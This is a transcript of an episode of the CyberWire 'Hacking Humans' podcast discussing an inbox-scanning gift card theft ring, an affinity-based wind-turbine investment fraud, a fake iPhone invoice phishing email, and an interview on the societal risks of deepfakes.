Sometimes, deepfake victims don't want to be convinced it is fake.
Etay Maor: A lot of times the victims, so to speak, don't want to be convinced that it's fake.
Dave Bittner: Hello, everyone, and welcome to the CyberWire's "Hacking Humans" podcast, where each week, we look behind the social engineering scams, the phishing schemes and criminal exploits that are making headlines and taking a heavy toll on organizations around the world. I'm Dave Bittner from the CyberWire, and joining me is Joe Carrigan from the Johns Hopkins University Information Security Institute. Hello, Joe.
Joe Carrigan: Hi, Dave.
Dave Bittner: Got some good stories to share this week and, later in the show, my conversation with Etay Maor. He is from Cato Networks, and we're going to be discussing the potential impact that deepfakes may have on our society.
Dave Bittner: All right. Joe, before we dig into our stories this week, we got some feedback on our story about the lightning rod edit.
Joe Carrigan: Right.
Dave Bittner: Evidently, this is a much more broadly used technique than I had previously considered. It...
(LAUGHTER)
Dave Bittner: So not a new idea.
Joe Carrigan: Really.
Dave Bittner: Well, we got several people who wrote in and basically shared their personal stories about how they had done exactly the same thing. So it seems as though this is a pretty common type of thing that people have learned to take advantage of in their professional lives. Not surprisingly, I guess, but nice to see that other people appreciated the telling of the tale and it resonated with them as well.
Joe Carrigan: Right.
Dave Bittner: Yeah. So thanks to everyone who wrote in about that. Several people shared their stories, and unfortunately, we don't have time to share them all. But we do appreciate you sending them in. All right. Well, let's move on to our stories this week. I'm going to start things off for us. My story comes from KrebsOnSecurity, and it's titled, "Gift Card Gang Extracts Cash From 100,000 Inboxes Daily."
Joe Carrigan: Really.
Dave Bittner: Yeah (laughter). So...
Joe Carrigan: That's a lot of emails to check, Dave.
Dave Bittner: It's a lot of emails to check. So this is a story written by Brian Krebs over at KrebsOnSecurity, and he's describing what he says is a successful and lucrative online scam which employs a low-and-slow approach. And what these folks do is they attempt to log into tens of thousands of email inboxes a day. And Brian Krebs is working with someone who is a cybersecurity professional who has sort of an inside view on email servers.
Joe Carrigan: OK.
Dave Bittner: And so this person is able to - has a window on tracking these sorts of things, right?
Joe Carrigan: Right.
Dave Bittner: So these folks are attempting to log in to between 50 and 100,000 inboxes a day.
Joe Carrigan: I'm going to bet that's automated.
Dave Bittner: It is?
(LAUGHTER)
Dave Bittner: Right. It's one guy, and, boy, is his...
(LAUGHTER)
Joe Carrigan: Are his fingers sore.
Dave Bittner: Yeah. Yeah. It was a major upgrade when he got himself a Walkman.
Joe Carrigan: Right (laughter).
Dave Bittner: So - and they're getting their credentials probably from the big credential breaches.
Joe Carrigan: Sure.
Dave Bittner: Right? But instead of going in and, you know, wreaking havoc with these email accounts, when they get in, they get into an email account, and they start searching. And what do you suppose they're searching for, Joe?
Joe Carrigan: Well, judging from the title of this article, I'm going to say gift cards.
Dave Bittner: Nothing gets by you, Joe.
Joe Carrigan: Right.
Dave Bittner: That is correct. That's absolutely correct. They are searching for gift card data. And so what they'll do is they'll log in a few times a month once they've established access to someone's email account. They'll log in a few times a month - again, an automated process. And they're looking for gift card - links to gift cards.
Joe Carrigan: Really.
Dave Bittner: Links to - what do you call it? - mileage. You know - your mileage points from your airline.
Joe Carrigan: I see.
Dave Bittner: Links to hotel rewards, things like that - because many of these things we receive via email.
Joe Carrigan: Right.
Dave Bittner: I'm - certainly I've received gift cards from friends.
Joe Carrigan: Sure.
Dave Bittner: Hey, happy birthday. Here's a $50 Amazon gift card.
Joe Carrigan: I've received that as well and sent them.
Dave Bittner: Yeah. Yeah. Another point they make here is that sometimes employers, with their health insurance, will have rewards programs where they will say, you know, if you agree to walk around the block every day for a month, you'll get a $5 gift card - right? - $5 Starbucks gift card or something like that or an Amazon gift card.
Joe Carrigan: Sounds like a lot of work for five bucks...
Dave Bittner: It does (laughter). But these folks, these bad guys, have figured out - they've also built some automation to enroll their victims in those programs and automatically get the rewards.
Joe Carrigan: Really?
Dave Bittner: Yeah. Yeah. So they go in and they search for these sorts of rewards, and then they sell them online. And they - this article points out that gift cards are very easy to sell online. They typically get about 80% of the value of the gift card - so quite lucrative.
Joe Carrigan: Great way to launder money.
Dave Bittner: It is a great way to launder money.
Joe Carrigan: Well, actually, I shouldn't say that because you still have to, like I said - I've said this before. It's a great way to move money around is what I should say.
Dave Bittner: Yeah. Yeah. Yeah. But I think it is a pretty common way to launder money. I mean, this is sort of getting off on a tangent here, but being able to go into your local grocery store, buy up a bunch of, you know, credit cards, cash credit cards and - that is a way to shift money from one form to another that bad guys take advantage of a lot.
Joe Carrigan: Indeed.
Dave Bittner: So this - a couple of things here. I mean, the obvious way around this is to beef up your security in your email account - two-factor, right?
Joe Carrigan: Right. Absolutely. Two-factor authentication does wonders to - these guys can't automate this with two-factor authentication.
Dave Bittner: Right. Right.
Joe Carrigan: And that makes it difficult to do at scale, if not impossible.
Dave Bittner: Yeah. If you don't have two-factor on your primary email account, what the heck are you waiting for?
Joe Carrigan: Right. Do it now.
Dave Bittner: I mean, it's - I don't know how many times we can bang that drum and just - we're past the point where you can't do that, right? It just it has to be a standard thing. There are too many things coming through your primary email account to not put that additional layer of security on it.
Joe Carrigan: Yeah. That's the root of the - of your identity, essentially, online, is your email account.
Dave Bittner: That's right.
Joe Carrigan: And I've said here before that email is terrible because it allows anybody to put something in there, which makes it a very vulnerable route to all of your identity online. So the best way to protect yourself here is multi-factor authentication, particularly with a hardware key.
Dave Bittner: Yeah.
Joe Carrigan: That will stop like, almost 100% of these things.
Dave Bittner: So this article made me ponder something that I'm curious for your opinion on here, Joe.
Joe Carrigan: OK.
Dave Bittner: And that is they're talking about credentials for things like Gmail and Microsoft Office 365.
Joe Carrigan: Right.
Dave Bittner: This got me thinking that one of the things we talk about all the time here is that you should not reuse credentials.
Joe Carrigan: Yes.
Dave Bittner: Right?
Joe Carrigan: Right.
Dave Bittner: But think about a service like Gmail or a service like Office 365, where one login is your email. It's your documents.
Joe Carrigan: Right.
Dave Bittner: Right? It could be your chat.
Joe Carrigan: Oh, yeah.
Dave Bittner: It could be your video conferencing. It could be - I mean, there are many, many things that fall under this.
Joe Carrigan: Yeah. Whether you're using Skype Teams or Hangouts.
Dave Bittner: Right.
Joe Carrigan: Yeah. It's all included with these big tech companies. Right.
Dave Bittner: Right. So isn't that, in effect, kind of reusing a password for multiple services?
Joe Carrigan: I don't know that I'd say that. I think it makes that username and password pair much more valuable.
Dave Bittner: Yeah.
Joe Carrigan: Right? And if you're using that same username and password pair on other sites, that's what makes it vulnerable. But these large companies, while they may not do a great job at privacy, they generally do a pretty good job at security. And there is a distinction there. I think Microsoft does a pretty good job with privacy, but, you know, Google, we all know what Google is up to. Amazon is the same way.
Dave Bittner: (Laughter) Right.
Joe Carrigan: You know, they make money selling ads and selling us stuff.
Dave Bittner: Yeah.
Joe Carrigan: So - whereas Microsoft makes money selling us hardware and service - software services. And the same with Apple - Apple makes their money selling hardware and software services.
Dave Bittner: Right.
Joe Carrigan: So their business model is more focused on the - lends itself to more privacy. But I digress. I'm talking about the - your question was about whether or not this essentially amounts to password reuse. I don't think so. I wouldn't say that.
Dave Bittner: Yeah.
Joe Carrigan: You're only using - if you're reusing your - the same password, like on Netflix or on some website that you have no idea what these people do - right? It's - a lot of website - maybe you're into some kind of message board or you're on some kind of message board for one of your hobbies, right? When you go on there, don't use the same password that you use for your email accounts because you have absolutely no idea what the security of that password is. It could just be stored in plain text behind the - in the database behind there. So if someone gets access to that database, they don't even need to crack your password.
Dave Bittner: Right.
Joe Carrigan: They have it. I can guarantee you that Microsoft, Google, Amazon, Apple, none of those guys stored their passwords - your passwords in plain text.
Dave Bittner: Right. Right.
Joe Carrigan: They all use, you know, hashes - and good hashes at that.
Dave Bittner: Well, I mean, maybe a different direction to come at this, then, is to say that because one password gives you access to so many different things that are important to you under these umbrellas, all the more reason to have that second factor.
Joe Carrigan: Yes - and to have a good strong password as well. Unique, strong password - use a password manager. And if you're only going to do one thing, use multi-factor authentication.
Dave Bittner: Yeah. Another thing I was curious about - I wonder, is there a way to have some sort of detection on your email account if particular searches are taking place? I don't know the answer to that. I can't think of an easy way to do that.
Joe Carrigan: Well, there - I mean, it depends on the application, right? It's a web application. There is a way to do it programmatically, but does that feature exist in the software? That's really the question.
Dave Bittner: Right.
Joe Carrigan: I don't know the answer to that. But yes, you could absolutely do that. Well, Microsoft or Google could absolutely do that.
Dave Bittner: Yeah. Yeah. Well, in this Krebs article, they provide indicators of compromise for the ISPs themselves. OK.
Joe Carrigan: OK.
Dave Bittner: So they could automate looking for this sort of thing.
Joe Carrigan: Right.
Dave Bittner: But I don't know. It got me thinking, I can't think of a way, within my own email client - either, you know, one running on my computer or my mobile device or a web-based one - of putting into place some sort of automated detection if a particular search takes place.
Joe Carrigan: I will say this. If they are using some kind of web client that downloads your email remotely, then there's really no way to detect it.
Dave Bittner: Yeah.
Joe Carrigan: All you can detect is the access and then whatever - like, let's say they're - I don't even know if Thunderbird is still a thing. But if they're using, like, Thunderbird - they could just use the Thunderbird client to search through all your stuff. And you would know - you would have no cognizance of that. But if they're using the web interface, that has to be submitted back to the server.
Dave Bittner: Right.
Joe Carrigan: So like, when you go through your Gmail and you type - you know, I'm looking for something from my buddy Peter. See what Peter sent me last - that would be trackable.
Dave Bittner: All right. Well, interesting article here. Again, it's from Brian Krebs over at KrebsOnSecurity. We will have a link to that in the show notes. Joe, what do you have for us this week?
Joe Carrigan: Dave, renewable energy is all the rage these days, is it not?
Dave Bittner: It is. It is.
Joe Carrigan: And what would you say is one of the biggest, probably most reliable or most in-development forms of renewable energy right now?
Dave Bittner: Oh, that's a good question. I would say - I want to say either solar or wind turbines.
Joe Carrigan: Wind turbines. That's where we're going today.
Dave Bittner: OK.
Joe Carrigan: So there is a story from MarketWatch about some Arkansas wind farmers who claimed their technology was more efficient than current wind turbines, and they managed to get $700,000 out of people as investors.
Dave Bittner: OK.
Joe Carrigan: And these investments ranged in size from $13,000 up to, I think, $300,000.
Dave Bittner: Wow.
Joe Carrigan: So there were some people that were really, really hurt by this. Now, these two guys are - have been convicted now of various crimes, including wire fraud, money laundering. Their names are Jody Davis and Phillip Vincent Ridings. They claim to be inventors of this turbine. They started a company called Dragonfly Industries International, and they said, we have this really cool new wind turbine. The Department of Defense is looking at it. We have a bunch of different places all over the world where they're looking to build it. And they used doctored reports from nationally recognized engineering firms. So...
Dave Bittner: Oh, interesting.
Joe Carrigan: They took these reports, and they faked them. And that's how they showed people, look, our wind turbines generate more electricity than current wind turbines. We're going to make millions.
Dave Bittner: So just run-of-the-mill fraud there.
Joe Carrigan: Right. Exactly.
Dave Bittner: Yeah. Yeah.
Joe Carrigan: Now what I find interesting about this is there's another story over - about the same set of events over on Northwest Arkansas Democrat, the Democrat-Gazette. It's - the website is nwaonline.com. I would have thought that was something else.
Dave Bittner: For the rap group.
Joe Carrigan: Yes.
Dave Bittner: Right.
Joe Carrigan: So that's where my mind goes immediately.
Dave Bittner: (Laughter) Right. Yeah.
Joe Carrigan: I'm thinking "Straight Outta Compton." No. No. This is the Northwest Arkansas Democrat-Gazette.
Dave Bittner: I bet they get that a lot. They get a lot of disappointed visitors to their website.
Joe Carrigan: But turns out that prison and religion played a big role in this scam. Right? Jody Davis was serving time in a federal prison in Texas for a fraud conviction in Oklahoma, and he befriended this guy. Let's just call him Mr. O. OK? I don't want to embarrass him. His name is in the report, but he befriended him through the prison ministries. So when he got out and Mr. O was also out, he convinced Mr. O that he was - that he had this new wind turbine technology and turned around and scammed one of his own guys, one of his own friends from the prison ministry, out of, like, many thousands of dollars.
Dave Bittner: No honor among thieves.
Joe Carrigan: Right. Well, I just wanted to bring this story up, that - I talk about tribalism from time to time on this show.
Dave Bittner: Yeah.
Joe Carrigan: Right?
Dave Bittner: Yeah.
Joe Carrigan: How the divisiveness of tribalism is bad for us. By the same token, the unity of tribalism is also very exploitable. Right? And when somebody approaches you and they say, hey, we were in the same - we go to the same church. We're a member of the same religious community.
Dave Bittner: Right. Right. This person is a - I'm a good Christian or I'm a good Jew or I'm a whatever it may be.
Joe Carrigan: Yeah. Yeah. Yeah. Yeah.
Dave Bittner: Exactly. Exactly.
Joe Carrigan: When somebody approaches me and starts saying that - and this is probably just my, you know, my suspicious nature. But whenever somebody starts talking to me like that, I am immediately put off by it. Right? You know, my business ventures are not dependent upon whether or not you're of a particular religion or of the same religion as me. If I'm going to have business ventures with you, I want to see what your business plan is. I want to see what your technology is. I want to - I don't really care about your religion. But for some people, it's very important. And that importance can be exploited, as it was here. This guy, Mr. O., actually went out and vouched for Davis and his partner and actually wound up getting more people involved in this.
Dave Bittner: I see.
Joe Carrigan: So there's a quote in the article that says, Jody Davis was one of our Christian brothers, so I never doubted or thought that something was being done. And the money is all gone. These guys spent the money on, like, down payments for houses. They bought fancy cars and even a trip to Disneyworld. So...
Dave Bittner: (Laughter) Wow.
Joe Carrigan: These people are essentially out all of their money.
Dave Bittner: Do you - I mean, I think this is a really interesting point that you make here. And I'm trying to think for myself, do you think there's anything in your own life that you would be predisposed to give someone benefit of the doubt because they are in the same group as you or, you know, something like that?
Joe Carrigan: That's a good question. You know, my initial response is, oh, no way, Dave, I'm too smart for that.
Dave Bittner: Right. Well, exactly.
Joe Carrigan: But there probably is, isn't there?
Dave Bittner: Yeah. It's your church or your - you know, I mean, your neighborhood association, your college, your...
Joe Carrigan: See; you know...
Dave Bittner: ...What kind of music you listen to. There's so many things that we're - we group ourselves into.
Joe Carrigan: Yeah, exactly. Some of the music I listen to - I wouldn't trust any of those people.
(LAUGHTER)
Dave Bittner: Right. Honestly, Joe, I've heard some of the music you listen to.
Joe Carrigan: Right.
Dave Bittner: And I don't really trust you myself. So...
Joe Carrigan: Right. Exactly.
Dave Bittner: (Laughter).
Joe Carrigan: You know, my neighborhood association - I don't know. I know where those people live.
Dave Bittner: Yeah.
Joe Carrigan: So...
Dave Bittner: Yeah, exactly.
Joe Carrigan: That's a big difference. So I'm more likely to trust my neighbors. But, you know, I have an existing relationship with them. But that's what this guy had with Jody Davis.
Dave Bittner: Right.
Joe Carrigan: He had an existing relationship with him, and that got exploited.
Dave Bittner: Yeah. But also, I think part of this is if someone that you have a pre-existing relationship and you have pre-existing trust with...
Joe Carrigan: Right.
Dave Bittner: If that person comes to you and says, I'm vouching for this other person, that can short-circuit your own skepticism...
Joe Carrigan: Right.
Dave Bittner: ...Because you'll transfer that trust you have in the first person to the second person...
Joe Carrigan: Exactly.
Dave Bittner: ...Whether or not it's justified.
Joe Carrigan: Yeah, yeah.
Dave Bittner: And so it's something to be wary of.
Joe Carrigan: Right. Now, I can think of several people who live in my neighborhood who I think are smart people...
Dave Bittner: Yeah.
Joe Carrigan: ...Who, if they said, hey, Joe; we got an investment opportunity, I'd be like, oh, hey; I'm interested. You're a smart person.
Dave Bittner: Right, right. Yeah. Well, and also, I think it's important to recognize that knowledge, expertise and skill in one area does not necessarily transfer to other areas.
Joe Carrigan: Yeah, absolutely.
Dave Bittner: You may be a brilliant brain surgeon, but that doesn't mean you know anything about investments.
Joe Carrigan: Right. Yeah.
Dave Bittner: Yeah, yeah. All right. Boy, that's an interesting one. I'm going to be thinking about that one for a while. Yeah. All right. Well, we'll have a link to all of our stories in the show notes. But, Joe, it is time to move on to our Catch of the Day.
(SOUNDBITE OF REELING IN FISHING LINE)
Joe Carrigan: Dave, our Catch of the Day comes from a listener who did not leave a name.
Dave Bittner: OK.
Joe Carrigan: They write, (reading) hi, Dave. Hi, Joe. I just received this email that could be a potential Catch of the Day. It's supposed to be an invoice for an iPhone XS Max 128 gigabyte chili.
Joe Carrigan: You know what that means, Dave - the chili?
Dave Bittner: I don't know what the chili part means, no.
Joe Carrigan: Is that the color, maybe?
Dave Bittner: Not that I know of, and I'm pretty steeped in this stuff. But maybe I'm missing something. I don't know. Who knows?
Joe Carrigan: (Reading) The subject of the email was, thank you for purchasing an iPhone XS Max 128 gigabyte chili. I never bought one of these, and my first thought was, who's trying to scam me?
Joe Carrigan: Well, this person is a listener to our show, obviously.
Dave Bittner: (Laughter) Right.
Joe Carrigan: A very smart listener. Instead of, how do I get my money back, which is good...
Dave Bittner: Yeah.
Joe Carrigan: ...I'm glad that's your first thought here.
Dave Bittner: Yeah.
Joe Carrigan: (Reading) The email comes from a Gmail account. Also, I was on the BCC line.
Joe Carrigan: That's interesting.
Dave Bittner: Oh.
Joe Carrigan: Not the to line or the CC line.
Dave Bittner: Yeah.
Joe Carrigan: (Reading) Have fun with this one.
Joe Carrigan: Now, the BCC line - that's blind carbon copy. You can put a whole list of, like, a million people in the BCC line, and it will look like that email was sent to one person.
Dave Bittner: Right.
Joe Carrigan: And...
Dave Bittner: Right.
Joe Carrigan: ...You won't know to whom else it was sent.
Dave Bittner: Right - another red flag.
Joe Carrigan: Yes.
Dave Bittner: Yeah. All right. So this one reads like this. The subject is, (reading) thank you for purchasing iPhone XS Max 128 gigabyte chili. Dear unique buyer, I very thank you for purchasing iPhone XS Max 128 gigabyte chili from Telepay International (ph) on PayPal. Your order have been successfully processed and dispatched for shipment. Product details - invoice number product iPhone XS Max 256 gigabyte chili.
Dave Bittner: There's a discrepancy. (Reading) Order date 03-09-21, expected delivery date 04-09-2021, value 999 98 cent U.S. dollar, payment method auto debit. For any quire or concern regarding your purchase or wanted to make any changes regarding delivery address, feel free to contact our accounts department and express your issues, including purchases and cancellations of the order. You can reach us at this phone number. Regards, accounts department.
Joe Carrigan: So I think this is another scam where they try to get you to call in, and they try to either get you to cough up your credit card details or maybe get you to open up their - a remote connection to their computer...
Dave Bittner: Yeah.
Joe Carrigan: ...And say, we got to make sure - we got to log in to your bank and make sure this is the case. And...
Dave Bittner: Right.
Joe Carrigan: Who knows?
Dave Bittner: I'm curious - so a couple things that draw my attention here. First of all, the text of the email mentions 128 gigabyte phone. The product listed here is a 256 gigabyte phone.
Joe Carrigan: Yep.
Dave Bittner: So there's a discrepancy.
Joe Carrigan: Very sloppy.
Dave Bittner: Yeah. I'm interested in the fact that they place the value at $999.98.
Joe Carrigan: Well, you got a one penny discount, Dave.
Dave Bittner: Well - but I was thinking, first of all, this is a $1,200 phone.
Joe Carrigan: Oh, OK. All right.
Dave Bittner: But that's not my primary interest here. What I'm curious is, do we think there's any psychological reason why they're keeping that number below $1,000?
Joe Carrigan: That's a good question.
Dave Bittner: Yeah.
Joe Carrigan: Maybe.
Dave Bittner: I don't know. Maybe one of our listeners knows. I mean, I know there - obviously, there's that whole thing in pricing where you say - you know, you make something 99.99 instead of $100.
Joe Carrigan: Right.
Dave Bittner: And people are more likely to buy it.
Joe Carrigan: Right.
Dave Bittner: Yeah. But I don't know if this relates to that or not. Is there a subtle psychological pull of keeping it under a thousand dollars?
Joe Carrigan: I don't know.
Dave Bittner: Interesting question.
Joe Carrigan: It is.
Dave Bittner: Yeah.
Joe Carrigan: It would be interesting to see the effectiveness of other phishing emails that have prices over a thousand dollars.
Dave Bittner: Yeah. Well, we know these folks iterate, right?
Joe Carrigan: Yep, they do. That's right.
Dave Bittner: (Laughter) There's no cost for sending out 100,000 emails, so...
Joe Carrigan: (Laughter) That's exactly right.
Dave Bittner: They iterate.
Joe Carrigan: It's practically free, Dave.
Dave Bittner: Yeah. All right. Well, thanks to our listener for sending that in. We do appreciate it. We would love to hear from you. If you have a Catch of the Day for us, you can send it to us. It's hackinghumans@thecyberwire.com.
Dave Bittner: All right, Joe. I recently had the pleasure of speaking with Etay Maor from Cato Networks. And our conversation centers on this notion that deepfakes are here to stay, and we wonder what impact they might have on our society. Here's my conversation with Etay Maor.
Etay Maor: I think we're finding ourselves in an interesting point of time because deepfakes are already out there. They're already being used. They're not, I would say, something that is considered as widespread as may be phishing or malware. But I think at the same time, there's a reason the FBI issued a warning that deepfake attacks are imminent in the next 12 to 18 months. The technology is moving really fast, making very sophisticated videos much more accessible than they were before.
Dave Bittner: You know, I think over the past year or so, maybe a little more than that, we've been seeing a lot of technology demonstrations of this, you know? There was one that made the rounds where someone had replaced themselves with a picture of Tom Cruise, and it was very convincing. And I've seen things recently where they could start using this technology for things like dubbing in foreign films so that the - you know, for the first time, the lips will match with the dubbed dialogue is saying. So I think we're getting more accustomed to this, that this is coming. But the notion that it's available to the bad guys - I think that's something that a lot of us are still getting used to.
Etay Maor: Yeah. I mean, deepfakes in their different variations - and you mentioned a couple of them - have been around for a while, right? Face-swapping and games - like, changing faces of people - I've done that with my kids for, you know, five years now, five years ago. But what we're seeing now is that these are becoming much more sophisticated and much easier to access. So you don't really need, for example, programming knowledge in order to run some of these deepfakes or to create them, not to mention the fact that, you know, if you're only dealing, for example, with voice synthesis, then it becomes even easier.
Etay Maor: And yes, the bad guys do have them. And it's an interesting point because who is the bad guy? I have seen attacks using deepfakes, right? There was this case not too long ago of a mother who used a deepfake with a cheerleading team. There was a whole issue there where they created a fake video. So it's becoming, you know, much more accessible to everybody. And I have zero doubt that this is going to be used in the very near future for political issues and for creating tensions between different adversarial, or not adversarial yet, countries, if that makes sense.
Dave Bittner: Can you give us some examples of where you've seen this being used?
Etay Maor: Yes. So there was a case in a bank, for example, where - well, not targeting a bank, but targeting a company - where it was used pretty similar to what is called BEC - business email compromise attacks, where somebody takes control over a manager's email and sends requests for money transfer on their behalf. It was used in the same way with voice. So somebody synthesized using a deepfake voice of a manager and created a message asking another person to move money out of certain accounts. So we've already seen that. I think there was $200,000 or $300,000 that were lost there.
Etay Maor: We have seen a lot of different deepfake, like I said, potentials in the making. There was the case that I just mentioned. Now, there was a case also in the Netherlands about a couple of - I think about a month or so ago, where somebody created a deepfake video and shared it with the parliament over in the Netherlands. So we've already seen some usages of it.
Etay Maor: We're also - due to this technology, we are now faced with something called the liar's dividend, where the very mere fact that the technology exists can be used without using the technology, which doesn't seem to make sense. But let me give you an example. Now you will have situations where you have - for example, let's say somebody was caught leaving a building, whatever the situation was. He can claim, that wasn't me on the video. That was a deepfake of me. So now the fact that deepfake is out there can be used to say - by people who actually committed a crime or committed something that they didn't want other people to know about, to say, no, no. That wasn't me. Somebody faked that video. I swear to you, it wasn't me.
Dave Bittner: (Laughter).
Etay Maor: And that's called the liar's dividend. And that's - you know, that's another distortion of reality. So what can I believe? How can I believe this?
Dave Bittner: Right. Right. Who are you going to believe, me or your lying eyes, right (laughter)?
Etay Maor: And can I add another level of sophistication now just to that?
Dave Bittner: Please. Please.
Etay Maor: So something called GPT-3, which is an artificial intelligence engine that has - I think it was - don't get me by the number - I think 170 billion neural networks. And it has terabytes of information that it consumed. And it can generate articles based on this information. And scientists are having a hard time telling the difference between a human-written article and a machine-written article using - that was using GPT-3. And it's not only that, it can also answer questions on that topic, which is amazing for, like, really good things - right? - science, medicine, stuff like that. But I've seen some freaky things with it. I've seen somebody use a very simple deepfake with the GPT engine behind it. And he was having a conversation with the computer. And the computer was answering questions in a very logical sense.
Etay Maor: At some point, they got into, like, does he have feeling? Is he aware of himself? So it got really interest. But the fact that you can now put an engine like this behind also a deepfake, potentially, you're fully automating everything. You don't even need the human intervention in the middle. Think about it. You can say, for example, to GPT, hey, Etay is interesting. I'm not. But let's say Etay is interesting. Let's get everything he did on his social network. And let's see, what is the best way to open a conversation with him? And let GPT decide that. And then, perhaps, put even a deepfake behind it.
Dave Bittner: I can think of, you know, folks who are in the public eye - celebrities, politicians, podcast hosts...
(LAUGHTER)
Dave Bittner: ...Where there's a large library of information available about them, but also hours and hours of recordings that could be ingested and used to, as you say, both generate the visual and the audio of the deepfake, but also the logic behind it so that it - you know, I could imagine, as you say, it answering questions in the way that the celebrity would.
Etay Maor: Exactly. I mean, for voice synthesis, you don't need more than five minutes. Everybody has more than five minutes somewhere. And if not, you know, an attacker can potentially call somebody up. Hey, I have a poll with, like, hey, just answer these questions and you get $100, whatever. You can socially engineer somebody to talk to you for five minutes. That's not a problem. And then getting some high-resolution photos of them, especially with certain mouth movements, when the teeth - when you can see the teeth, when you can see the tongue, when, you know, different lips positioning. Yeah, this is - I don't like to spread FUD - you know, fear, uncertainty and doubt - and be like the doomsayer.
Dave Bittner: Yeah.
Etay Maor: But again, there's a reason that the FBI is warning that these attacks are imminent. The technology is moving so fast. And the technology to detect it is also getting there, but it's not on pace. There are some very interesting things out there like FakeNetAI, which I talked to in the past - that they're doing these kind of, hey, let's be able to detect these types of deepfake videos. But really, three years ago, I wouldn't think that we'd be at this point in time with deepfakes that's so sophisticated, so convincing and so easily accessible.
Dave Bittner: Well, then what is to be done here? I mean, I've heard people talk about the possibility of, for example, for news reporting, having some sort of chain of custody. You know, dare I invoke the blockchain? But, you know, having some way to verify that this video, this audio, whatever it may be, has been through a verified chain of custody throughout its life. Are those possible approaches we could take?
Etay Maor: Yes. I would say, first of all, before I even go into that is, first of all, we all need to be aware that these things are out there and their level of sophistication - who holds this technology and can access it? And what can be done with it? First of all, we have to be aware that there may be things out there that we shouldn't trust. Once we have that in place, then yes, we will need to use technology and human verification to identify if these things are bad or not. One of the things you mentioned is an interesting approach. Another way is, like I said, you can do video and audio analysis. You can search for certain glitches. For example, in AI-created pictures, you can see glitches - here's a tip - usually around the ears or in the hair. There are some glitches that can happen in videos like this when you try to force somebody's lips in a certain way if you don't have a very good sample of it.
Etay Maor: But I have to say this. One of the things that really bothers me around these things is a lot of times, the victims, so to speak, don't want to be convinced that it's fake. If you're using this just as an echo chamber for extremist groups or for different propaganda or for, you know, whatever it is, conspiracy theories, for those types of recipients of the media, they're like, hey, I've seen this person say it. Then that's it. It's true.
Dave Bittner: Right.
Etay Maor: And we don't even have to go very far as to deep fakes, right? Because when you talk about myths and disinformation, there are all kinds of levels to it, from missing context to deceptive editing. We've seen this example this week, right? I think it was the women's soccer team. There are reports that they were not looking or given respect to the national anthem. And there was a video of it, and I saw it. And it really looks convincing. But if you add the context that some of them were looking at the flag while some were looking at the person who or the veteran who was playing the music, then you see that actually there was nothing there. There was not - they all respected the flag and the anthem.
Dave Bittner: Right.
Etay Maor: But for those who are receiving this and want - they hear what they want to hear, it doesn't matter at that point.
Dave Bittner: Interesting times ahead, yes?
Etay Maor: Definitely. And again, with the whole idea of the liar's dividend and with - well, not an idea. It's a fact. And these technologies - it's going to be really interesting how you distinguish reality from something that was made up. And, you know, do people even care at some point?
Dave Bittner: All right, Joe, what do you think?
Joe Carrigan: Dave, deepfakes are something that are on the horizon.
Dave Bittner: Yep.
Joe Carrigan: ...Like, credible deepfakes. And I'm not talking like on the horizon like fusion power is on the horizon, right? That's...
Dave Bittner: Right.
Joe Carrigan: That's always 10 years away. These things are going to be here soon.
Dave Bittner: Yeah.
Joe Carrigan: And Etay does talk about the FBI warning throughout this interview. That the FBI feels it necessary to actually release a warning - I think it's something we should all be paying attention to. You brought up some good points that there are some really good legitimate use cases for this technology, like dubbing movies.
Dave Bittner: Yeah.
Joe Carrigan: You know, that would keep me from having to read subtitles and missing the action of the movie, right? Etay says he has zero doubt that this is going to be used politically. I would say it this way. I am 100% certain that this will be used politically in the future.
Dave Bittner: Yeah.
Joe Carrigan: I have never been more certain of anything in my life.
Dave Bittner: (Laughter).
Joe Carrigan: This will happen in the next election cycle.
Dave Bittner: Right. Yeah.
Joe Carrigan: There will be tons of deepfakes coming out soon with this election cycle.
Dave Bittner: Yeah.
Joe Carrigan: And it's - some of them are going to be funny. Some of them are going to be really, really scary and deceiving. One thing that Etay brings up that I think is a great name - he calls it the liar's dividend. That is a huge consequence of this technology. That is something that's going to change the landscape, and we're going to have to have a way of discerning whether or not a video is real or fake. I mean, we've - every now and then, we've had - I can't think of a specific example. But we had somebody where - something where somebody tweets something that's not - an inappropriate tweet, let's say.
Dave Bittner: Yeah.
Joe Carrigan: And then they say, oh, my account was hacked. And, of course, Twitter gets on and looks at it and says, well, no, we didn't see any unusual activity. And the person confesses, oh, yes, that was me.
Dave Bittner: Right.
Joe Carrigan: Right?
Dave Bittner: Right.
Joe Carrigan: This is going to be like that on steroids, right? Etay talks about the GPT-3, which is the OpenAI product. Microsoft actually owns the license to that, but you can still use it with - you can still use the API. You can pay OpenAI to use that.
Dave Bittner: Right.
Joe Carrigan: He makes a very important point that I wanted to highlight. All the information we put on social media can be fed into this model. This model has billions of inputs, and it can spit out a conversation opener that is more likely to catch your interest. And we talked about this recently as well - I can't remember if it was on "Hacking Humans" or on the CyberWire Daily show - about the guys - I think they were from Singapore - who used this exact model, OpenAI's GPT-3, to generate phishing emails and found that AI was - that this model was more effective at generating phishing emails than they were against people they knew...
Dave Bittner: Right. Right.
Joe Carrigan: ...Which is remarkable. And they said more study needs to be done on that, and I agree. But this was - they presented that at DEF CON...
Dave Bittner: Yeah, yeah.
Joe Carrigan: ...This year, this past - just recently. We do need to be aware that this stuff is out there and exists and who has access to it. But unfortunately, who has access to it is just about anybody that wants it. The OpenAI product is available to anybody that wants to utilize it via the API. There are tons of other products out there that will let you generate deepfake speech. And I imagine that there - in fact, we were talking last week or two weeks ago about deepfake video services that are out there now...
Dave Bittner: Right. Yeah.
Joe Carrigan: ...As - to make customizable videos. These things are available to anybody who has the money to pay for them. So...
Dave Bittner: And it's not expensive.
Joe Carrigan: And it's not expensive - exactly.
Dave Bittner: Yeah.
Joe Carrigan: There are artifacts that are evidence of deepfakes, but those are going to become smaller and smaller and smaller.
Dave Bittner: Right.
Joe Carrigan: This is going to be an arms race of detecting these deepfakes. And the bigger problem is the humans. There are some people you'll show these deepfakes to. You may even tell them that they're deepfakes when you're showing it to them, but they're still going to believe them...
Dave Bittner: Yeah.
Joe Carrigan: ...Because of their belief set.
Dave Bittner: Right, right. Yeah. I remember - there's a saying, I think, sort of in the skeptical world. You know, there's that old saying, I'll believe it when I see it. And the inverse of that is I'll see it when I believe it.
Joe Carrigan: Right (laughter).
Dave Bittner: And I think there's something to that with this.
Joe Carrigan: Yeah.
Dave Bittner: I just - you know, I think this adds an overlay of anxiety of, who do we trust?
Joe Carrigan: It does.
Dave Bittner: Right? We can't trust our own eyes. And I think it chips away at the sources of authority in our lives because if anybody can say, oh, that news clip was probably just a deepfake...
Joe Carrigan: Right.
